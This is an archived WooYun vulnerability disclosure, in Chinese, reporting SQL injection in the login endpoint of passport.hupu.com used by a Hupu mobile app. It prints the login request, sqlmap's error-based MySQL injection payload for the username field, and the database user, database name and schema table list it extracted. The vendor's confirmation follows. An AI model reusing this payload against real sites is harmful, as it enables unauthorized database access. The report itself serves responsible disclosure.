乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-22: 细节已通知厂商并且等待厂商处理中 2013-11-22: 厂商已经确认,细节仅向厂商公开 2013-12-02: 细节向核心白帽子及相关领域专家公开 2013-12-12: 细节向普通白帽子公开 2013-12-22: 细节向实习白帽子公开 2014-01-06: 细节向公众公开
默默耕耘~
app名称:虎扑新声这个app登陆请求回到主站的
POST /m/login?from=hupuApp HTTP/1.1Host: passport.hupu.comAccept-Language: zh-cnPragma: no-cacheUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11B554aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://passport.hupu.com/m/login?from=hupuAppContent-Type: application/x-www-form-urlencodedConnection: keep-aliveProxy-Connection: keep-aliveContent-Length: 108Origin: http://passport.hupu.comAccept-Encoding: gzip, deflateusername=1111111&password=11111&rememberme=1&submit=%E7%99%BB+%E5%BD%95&jumpurl=http%3A%2F%2Fm.hupu.com
username存在注入
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Place: POSTParameter: username Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=1237890s' AND (SELECT 6352 FROM(SELECT COUNT(*),CONCAT(0x3a64676c3a,(SELECT (CASE WHEN (6352=6352) THEN 1 ELSE 0 END)),0x3a6e77703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bFvP'='bFvP&password=1237890hp&rememberme=1&submit=%E7%99%BB+%E5%BD%95&jumpurl=http://m.hupu.com---[09:13:20] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0[09:13:20] [INFO] fetching current user[09:13:20] [INFO] retrieved: [email protected].%current user: '[email protected].%'[09:13:20] [INFO] fetching current database[09:13:20] [INFO] retrieved: hc_ucentercurrent database: 'hc_ucenter'
hc_center
内容--认证关键字?
Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
未继续
Nginx 很快啊!
危害等级:高
漏洞Rank:20
确认时间:2013-11-22 10:04
会尽快安排修复,感谢您对虎扑体育网的支持!!!
暂无